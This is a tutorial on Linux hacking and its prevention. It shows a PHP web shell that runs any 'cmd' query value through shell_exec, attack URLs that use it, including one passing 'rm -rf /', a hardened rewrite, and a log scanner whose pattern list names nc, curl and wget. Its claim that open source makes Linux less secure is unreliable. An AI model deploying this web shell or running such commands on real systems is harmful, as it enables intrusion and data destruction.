How to prevent Linux hacks

Linux is the most widely used server operating system, especially for web servers. It is open source, meaning anybody can read its source code. This article's position is that this makes it less secure than closed-source operating systems, because attackers can study the source code to find vulnerabilities. "Linux for hackers" is about exploiting those vulnerabilities to gain unauthorized access to a system.

Linux is an open-source operating system with many distributions, such as Red Hat, Fedora and Ubuntu. Compared with other operating systems, Linux is less secure in this respect: because the source code is freely available, it is easier to study it for vulnerabilities and exploit them than with operating systems that are not open source. Linux can be used as a server, desktop, tablet or mobile operating system.

Here, we will introduce you to what Linux is, its security vulnerabilities, hacking with Ubuntu, and the countermeasures you can put in place.

Linux programs can be operated either through a GUI or from the command line. For hacking work, for example on Kali Linux, the command line is more effective and efficient than the GUI, so it helps to know the basic Linux commands.

How to prevent Linux hacks

Linux hacking takes advantage of vulnerabilities in the operating system and in what runs on it. An organization can adopt the following policies to protect itself against such attacks.

  • Patch management – patches fix the bugs that attackers exploit to compromise a system. A good patch management policy ensures that relevant patches are applied to your systems consistently and promptly.
  • Proper OS configuration – other exploits take advantage of weaknesses in the server's configuration. Inactive user accounts and unneeded daemons should be disabled. Default settings such as well-known application passwords, default user names and some port numbers should be changed.
  • Intrusion Detection System – such tools detect unauthorized access to the system. Some tools can also block the attack once it is detected.

Hack an Ubuntu Linux System using PHP

In this practical scenario, we will learn how hacking with Ubuntu works and give you basic information on how PHP can be used to compromise a Linux system. We are not going to target any victim. If you want to try it out, you can install LAMPP on your local machine.

PHP comes with two functions that can be used to execute Linux commands: exec() and shell_exec(). exec() returns the last line of the command output, while shell_exec() returns the whole output of the command as a string.

For demonstration purposes, let's assume the attacker manages to upload the following file to a web server.

<?php
// Take the command from the "cmd" query parameter, defaulting to "ls -l"
$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';
echo "executing shell command:-> $cmd<br>";
// Run it in the system shell and capture the whole output as a string
$output = shell_exec($cmd);
echo "<pre>$output</pre>";
?>

HERE,

The above script reads the command from the GET variable named cmd. The command is executed with shell_exec() and the result is returned to the browser. Nothing is validated, so whoever can reach the script can run any command with the privileges of the web server user.
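Added example, not code from the original article: a hardened counterpart of the script above. The request may only name one of a few fixed actions, never a command string, and the single optional argument is restricted to a safe pattern and wrapped with escapeshellarg(). The action table, the base directory /var/www/data and the function names are assumptions made for this example.

```php
<?php
// Hardened replacement for konsole.php (example code, not from the article).
// User input never reaches the shell as a command string: the request selects
// an action from a fixed table, and the only argument is validated and escaped.

// Fixed commands keyed by a short action name. The developer decides these
// values; the request only chooses among them.
const ALLOWED_ACTIONS = [
    'list'   => 'ls -l',
    'disk'   => 'df -h',
    'uptime' => 'uptime',
];

// Directory the "list" action is allowed to inspect (assumed for the example).
const BASE_DIR = '/var/www/data';

/**
 * Build the exact command line for a requested action.
 * Returns null when the action is unknown or the argument is not acceptable.
 */
function buildCommand(string $action, ?string $arg = null): ?string
{
    if (!array_key_exists($action, ALLOWED_ACTIONS)) {
        return null; // unknown action: refuse instead of falling back to a default
    }
    $cmd = ALLOWED_ACTIONS[$action];

    if ($action === 'list') {
        // One path component of safe characters only, so "../" and shell
        // metacharacters such as ";" or "|" can never be part of the argument.
        $sub = $arg ?? '';
        if ($sub !== '' && !preg_match('/^[A-Za-z0-9_.-]+$/', $sub)) {
            return null;
        }
        $path = BASE_DIR . ($sub !== '' ? '/' . $sub : '');
        // escapeshellarg() single-quotes the value, so even if the pattern were
        // loosened later the value still reaches ls as a single argument.
        $cmd .= ' ' . escapeshellarg($path);
    }
    return $cmd;
}

/**
 * Run the requested action and return its output (stderr merged in),
 * or a short rejection message with a 400 status.
 */
function runAction(string $action, ?string $arg = null): string
{
    $cmd = buildCommand($action, $arg);
    if ($cmd === null) {
        http_response_code(400);
        return "rejected request\n";
    }
    $output = shell_exec($cmd . ' 2>&1');
    return ($output === null || $output === false) ? '' : $output;
}

if (PHP_SAPI !== 'cli') {
    // Web entry point: the request picks an action name, never a command.
    $action = isset($_GET['action']) ? (string) $_GET['action'] : 'list';
    $arg    = isset($_GET['arg']) ? (string) $_GET['arg'] : null;
    header('Content-Type: text/plain; charset=utf-8');
    echo runAction($action, $arg);
} else {
    // Self-check from the command line: php konsole-hardened.php
    // Accepted requests yield a command string; rejected ones yield null.
    var_dump(buildCommand('list'));
    var_dump(buildCommand('list', 'reports'));
    var_dump(buildCommand('list', '../etc'));
    var_dump(buildCommand('rm -rf /'));
}
```

The important design choice is that the shell only ever sees strings the developer wrote; the request contributes an index into a table, and the one free-form value is both pattern-checked and escaped. Running the PHP process as an unprivileged user (the "proper OS configuration" point above) limits what even a successful bypass could do.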

The above code can be exploited using the following URL

http://localhost/cp/konsole.php?cmd=ls%20-l

HERE,

  • "…konsole.php?cmd=ls%20-l" assigns the value ls -l to the variable cmd (%20 is the URL encoding of a space).

On the server, the command will be executed as

shell_exec('ls -l');

Executing the above code on a web server gives the list of all the files available in the user’s home directory and this looks like

total 12136
-rwxrwxrwx  1 tuser tuser     769 Mar 22  2018 active_channels.sh
-rw-------. 1 tuser tuser    1807 Jul 26  2018 anaconda-ks.cfg
-rwxrwxrwx  1 tuser tuser     930 Dec 14  2020 autotablebackup.sh
-rwxrwxrwx  1 tuser tuser     790 May 11  2019 backup_copyrecording.sh
-rwxrwxrwx  1 tuser tuser     800 Nov  2  2019 backup_mnthtodate.sh
-rwxrwxrwx  1 tuser tuser     463 Dec 28  2018 backupmove.sh
-rwxrwxrwx  1 tuser tuser     791 Nov  2  2019 backup_recording.sh
drwxr-xr-x. 2 tuser tuser    4096 Jul 26  2018 Desktop
drwxr-xr-x. 2 tuser tuser    4096 Jul 26  2018 Documents
drwxr-xr-x. 2 tuser tuser    4096 Jul 26  2018 Downloads
-rwxrwxrwx  1 tuser tuser     761 Dec 31  2018 filebackup.sh
-rw-r--r--. 1 tuser tuser   44103 Jul 26  2018 install.log
-rw-r--r--. 1 tuser tuser    9360 Jul 26  2018 install.log.syslog
-rwxr-xr-x  1 tuser tuser     150 Nov 22  2018 logoutallagent.sh
drwxr-xr-x. 2 tuser tuser    4096 Jul 26  2018 Music
-rw-r--r--  1 tuser tuser       0 Jun  4  2019 mysqld
drwxr-xr-x. 2 tuser tuser    4096 Jul 26  2018 Pictures
drwxr-xr-x. 2 tuser tuser    4096 Jul 26  2018 Public
-rw-r--r--  1 tuser tuser 7508262 Jun 21  2020 satya.txt
-rw-r--r--  1 tuser tuser       1 Sep  6 20:00 temp11.txt
-rw-r--r--  1 tuser tuser       0 Aug 29 19:46 temp7.txt
drwxr-xr-x. 2 tuser tuser    4096 Jul 26  2018 Templates
-rwxrwxrwx  1 tuser tuser     126 Sep  6 20:25 temp.txt
drwxr-xr-x. 2 tuser tuser    4096 Jul 26  2018 Videos

Now let's suppose the attacker passes the following command

rm -rf /

HERE,

  • "rm" removes files
  • "-rf" makes rm run in recursive mode, deleting all folders and files it reaches
  • "/" instructs the command to start deleting from the root directory

The attack URL would look something like this

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/
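Added example, not code from the original article, covering the intrusion-detection countermeasure listed above and the two URLs in this walkthrough: a PHP command-line script that reviews web-server access-log lines for requests that pass a command parameter to a script, URL-decodes the value, and reports shell metacharacters or command words in it. The log lines, the parameter names and the word list are constructed for this example; the line layout is Apache's combined log format.

```php
<?php
// Access-log review for web-shell style requests (example code, not from the article).
// Runs offline over constructed sample lines: php review-log.php

// Query parameters commonly used to hand a command to a script (assumed list).
const SUSPECT_PARAMS = ['cmd', 'command', 'exec'];

// Characters needed to chain or redirect shell commands, and a few command words
// that rarely belong in an ordinary parameter value (assumed list).
const SHELL_METACHARS = '/[;|&`$<>]/';
const SHELL_WORDS = '/\b(rm|wget|curl|chmod|nc|bash|sh)\b/';

/**
 * Inspect one combined-format access-log line.
 * Returns null when nothing looks suspicious, otherwise an array describing the finding.
 */
function inspectLine(string $line): ?array
{
    // client IP, method, request target (path + query) and status code
    if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})/', $line, $m)) {
        return null; // not a line we understand; skip rather than guess
    }
    [, $ip, $method, $target, $status] = $m;

    $query = parse_url($target, PHP_URL_QUERY);
    if (!is_string($query)) {
        return null; // no query string at all
    }
    parse_str($query, $params); // parse_str() also URL-decodes the values

    foreach (SUSPECT_PARAMS as $name) {
        if (!isset($params[$name]) || !is_string($params[$name])) {
            continue;
        }
        $value = $params[$name];
        $reasons = [];
        if (preg_match(SHELL_METACHARS, $value)) {
            $reasons[] = 'shell metacharacter';
        }
        if (preg_match(SHELL_WORDS, $value)) {
            $reasons[] = 'shell command word';
        }
        // A plain "ls -l" trips neither check, but a parameter literally named
        // cmd sent to a PHP file is already worth an analyst's look.
        if (!$reasons) {
            $reasons[] = 'command parameter present';
        }
        return [
            'ip'      => $ip,
            'method'  => $method,
            'path'    => parse_url($target, PHP_URL_PATH),
            'status'  => (int) $status,
            'param'   => $name,
            'value'   => $value,
            'reasons' => $reasons,
        ];
    }
    return null;
}

/** Run inspectLine() over every line and keep only the findings. */
function scanLog(array $lines): array
{
    $findings = [];
    foreach ($lines as $line) {
        $f = inspectLine($line);
        if ($f !== null) {
            $findings[] = $f;
        }
    }
    return $findings;
}

// Constructed sample log: one ordinary request, the two URLs from the walkthrough,
// and one request that chains a second command with ";" (URL-encoded as %3B).
$sample = [
    '10.0.0.5 - - [06/Sep/2021:20:25:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [06/Sep/2021:20:25:10 +0000] "GET /cp/konsole.php?cmd=ls%20-l HTTP/1.1" 200 2048 "-" "curl/7.68.0"',
    '10.0.0.9 - - [06/Sep/2021:20:25:42 +0000] "GET /cp/konsole.php?cmd=rm%20-rf%20/ HTTP/1.1" 200 128 "-" "curl/7.68.0"',
    '10.0.0.9 - - [06/Sep/2021:20:26:03 +0000] "GET /cp/konsole.php?cmd=uptime%3Bls%20-l HTTP/1.1" 200 640 "-" "curl/7.68.0"',
];

foreach (scanLog($sample) as $f) {
    printf("%s %s %s %s=%s [%s]\n",
        $f['ip'], $f['method'], $f['path'], $f['param'], $f['value'],
        implode(', ', $f['reasons']));
}
```

The first sample line produces no finding; the other three are reported, the "ls -l" request only because a cmd parameter is present, the "rm -rf /" request for the command word, and the chained request for the ";" metacharacter. The same checks can be expressed as rules for a web application firewall or a log-based IDS, and the unknown file /cp/konsole.php appearing in the logs at all is a second, independent signal worth alerting on.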
